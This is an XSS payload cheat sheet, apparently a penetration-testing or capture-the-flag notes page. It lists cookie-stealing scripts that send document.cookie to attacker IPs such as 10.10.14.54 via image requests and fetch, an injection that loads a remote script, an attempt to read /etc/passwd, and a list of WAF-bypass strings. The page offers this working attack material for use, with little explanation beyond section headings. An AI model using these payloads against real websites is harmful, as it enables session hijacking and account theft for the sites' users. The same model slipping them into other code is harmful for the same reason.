๐ฏ Basic Payloads#
<svg/onload="alert(document.cookie)">
<iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe>
<script>var i=new Image(); i.src="http://10.10.14.54/?cookie="+btoa(document.cookie);</script>
<script>var i=new Image;i.src="http://10.10.14.7:8888/?cookie="+document.cookie;</script>
<script> document.write('<img src="http://10.10.14.54/?cookie='+document.cookie+'" />'); </script>
<img src/onerror=this.src="http://10.10.14.74/?cookie="+btoa(document.cookie)>
<img src="http://10.10.14.54/" onload="var i=0;if(i++)this.src+='?cookie='+encodeURIComponent(document.cookie);"/>
<script>fetch('http://10.10.14.19:8000/?cookie=' + btoa(document.cookie));</script>
๐งจ Local File Access / Script Injection#
<img src=xasdasdasd onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<img src=gdgdgdfgert onerror="document.write('<script src=http://127.0.0.1/test.js></script>')"/>
<img src=x onerror=fetch('http://10.10.xx.xx/?cookie='+document.cookie);>
๐ต๏ธโโ๏ธ WAF Bypass Strings for XSS#
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>โ>โ><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window "></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
๐ Resources#
๐ OWASP XSS Filter Evasion Cheat Sheet
